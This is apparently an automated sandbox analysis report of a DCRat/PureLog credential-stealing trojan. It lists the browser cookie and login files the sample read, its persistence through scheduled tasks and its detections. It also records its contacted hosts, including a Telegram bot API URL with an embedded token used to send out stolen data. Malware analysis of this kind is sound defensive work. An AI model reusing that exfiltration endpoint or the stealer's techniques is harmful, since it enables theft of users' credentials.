                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

                                    Source: Yara matchFile source: 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: MsPortSavesruntime.exe PID: 7644, type: MEMORYSTR
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: PbfYaIvR5B.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.PbfYaIvR5B.exe.6b3ecda.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.MsPortSavesruntime.exe.cc0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\webHostnet\MsPortSavesruntime.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 147 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 3 Software Packing | NTDS | 231 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 23 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 11 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph: ID 1543377; Sample: PbfYaIvR5B.exe; Startdate: 27/10/2024; Architecture: WINDOWS; Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| PbfYaIvR5B.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Vigorf | |
| PbfYaIvR5B.exe | 100% | Avira | VBS/Runner.VPG | |
| PbfYaIvR5B.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\Desktop\MSRJxIpk.log | 100% | Avira | TR/AVI.Agent.updqb | |
| C:\Users\user\Desktop\MXTAwxLv.log | 100% | Avira | TR/AVI.Agent.updqb | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 100% | Avira | HEUR/AGEN.1323342 | |
| C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat | 100% | Avira | BAT/Delbat.C | |
| C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe | 100% | Avira | HEUR/AGEN.1323342 | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 100% | Avira | HEUR/AGEN.1323342 | |
| C:\Users\user\Desktop\XGvzhUkS.log | 100% | Avira | TR/PSW.Agent.qngqt | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 100% | Avira | HEUR/AGEN.1323342 | |
| C:\Users\user\Desktop\XLyrgJGd.log | 100% | Avira | TR/PSW.Agent.qngqt | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\mhsoucuo.log | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\lhjGsiaz.log | 100% | Joe Sandbox ML | | |
| C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe | 100% | Joe Sandbox ML | | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\XGvzhUkS.log | 100% | Joe Sandbox ML | | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\XLyrgJGd.log | 100% | Joe Sandbox ML | | |
| C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Recovery\AvdGjRxbXYfvkpkpztF.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\CjxtNgkC.log | 4% | ReversingLabs | | |
| C:\Users\user\Desktop\MSRJxIpk.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\MXTAwxLv.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\MaBbbrQq.log | 24% | ReversingLabs | | |
| C:\Users\user\Desktop\XGvzhUkS.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\XLyrgJGd.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\XurZRnMb.log | 24% | ReversingLabs | | |
| C:\Users\user\Desktop\lhjGsiaz.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\mhsoucuo.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\wVOwcuVh.log | 4% | ReversingLabs | | |
| C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\webHostnet\MsPortSavesruntime.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
                                    No Antivirus matches
                                    No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| http://crl.mic | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| https://g.live.com/odclientsettings/ProdV2.C: | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
| https://aka.ms/pscore68 | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://crl.v | 0% | URL Reputation | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ipinfo.io | 34.117.59.81 | true | false | | unknown |
| windowsxp.top | 188.114.97.3 | true | true | | unknown |
| api.telegram.org | 149.154.167.220 | true | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://api.telegram.org/bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto | false | | unknown |
| https://ipinfo.io/country | false | | unknown |
| https://ipinfo.io/ip | false | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | windowsxp.top | European Union | 13335 | CLOUDFLARENETUS | true
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
                                                                          IP
                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543377
Start date and time: 2024-10-27 19:21:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 53
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PbfYaIvR5B.exe
renamed because original name is a hash value
Original Sample Name: 7471eb468a1f0166167f369bec578915.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@46/68@3/4
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target AvdGjRxbXYfvkpkpztF.exe, PID 3584 because it is empty
                                                                          • Execution Graph export aborted for target AvdGjRxbXYfvkpkpztF.exe, PID 7144 because it is empty
                                                                          • Execution Graph export aborted for target Idle.exe, PID 2084 because it is empty
                                                                          • Execution Graph export aborted for target Idle.exe, PID 4312 because it is empty
                                                                          • Execution Graph export aborted for target MsPortSavesruntime.exe, PID 3128 because it is empty
                                                                          • Execution Graph export aborted for target MsPortSavesruntime.exe, PID 4020 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: PbfYaIvR5B.exe
Time | Type | Description
14:22:26 | API Interceptor | 34x Sleep call for process: MsPortSavesruntime.exe modified
14:22:32 | API Interceptor | 132x Sleep call for process: powershell.exe modified
14:22:43 | API Interceptor | 1382159x Sleep call for process: AvdGjRxbXYfvkpkpztF.exe modified
14:22:44 | API Interceptor | 2x Sleep call for process: svchost.exe modified
18:22:26 | Task Scheduler | Run new task: AvdGjRxbXYfvkpkpztF path: "C:\Recovery\AvdGjRxbXYfvkpkpztF.exe"
18:22:26 | Task Scheduler | Run new task: AvdGjRxbXYfvkpkpztFA path: "C:\Recovery\AvdGjRxbXYfvkpkpztF.exe"
18:22:26 | Task Scheduler | Run new task: Idle path: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
18:22:26 | Task Scheduler | Run new task: IdleI path: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
18:22:26 | Task Scheduler | Run new task: MsPortSavesruntime path: "C:\webHostnet\MsPortSavesruntime.exe"
18:22:26 | Task Scheduler | Run new task: MsPortSavesruntimeM path: "C:\webHostnet\MsPortSavesruntime.exe"
                                                                                              • 149.154.167.220
                                                                                              Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUCQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              na.docGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.95.91
                                                                                              SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.0.5
                                                                                              SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 104.20.23.46
                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.1.5
                                                                                              SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.1.5
                                                                                              SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                              • 104.20.4.235
                                                                                              SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.0.5
                                                                                              SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.97.3
                                                                                              f6ffg1sZS2.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                              • 188.114.96.3
                                                                                              wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.170.64
                                                                                              GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              seemeherewithgreatthingsentiretimewithgreatthingsonhere.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              seethebestthingswhichgivennewthingswithmewesee.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              SUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\Desktop\CjxtNgkC.logd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            BN57miasVe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              YhyZwI1Upd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (716), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):716
                                                                                                                  Entropy (8bit):5.8658968580031
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:G5dud7+voXnrfWTPZlkDQaTOkQeAVZVbVTO0m5XAH/bqTx7nn3tfji/KRwVLqWk4:G7ud7+w2PZlkndQe2hO0mifOdj3pjUrv
                                                                                                                  MD5:E803FA0329975084BA5A550053407E7D
                                                                                                                  SHA1:3E5BC9B189A4316A4EBCA41835AC18351B6117DB
                                                                                                                  SHA-256:52B6BE2D088F3E5A617C6D14445AF33E035687625E07EBE0077BACAEB1276017
                                                                                                                  SHA-512:11F84E78071808D934D767C4399DC69C41DCB8D893D1AA5557805119EFB83A584AEE6E584E289E292872241E3B040C7BAACC3A4B36BE8E619B5DB1AD9EB99E3D
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa2513613, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.4221847157873599
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                  MD5:F15F3424F09C7D00107E622646C16377
                                                                                                                  SHA1:13B87E69F4AFA6E15210955A43E934667F1384EA
                                                                                                                  SHA-256:E075B8A57066A4616F3712E3B7F52ADD262478DC67DFC79BBAE5B2E93FCA8CBC
                                                                                                                  SHA-512:482162123D5743F1EEC64FC8080BF8CD3CF63494508AE5B3AD045006EA320585AA6C8CB11299DD786F9ED469CE98C658616CCFA400E9FF40903E06ADE80BD181
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (894), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):894
                                                                                                                  Entropy (8bit):5.9195193753885516
                                                                                                                  Encrypted:false
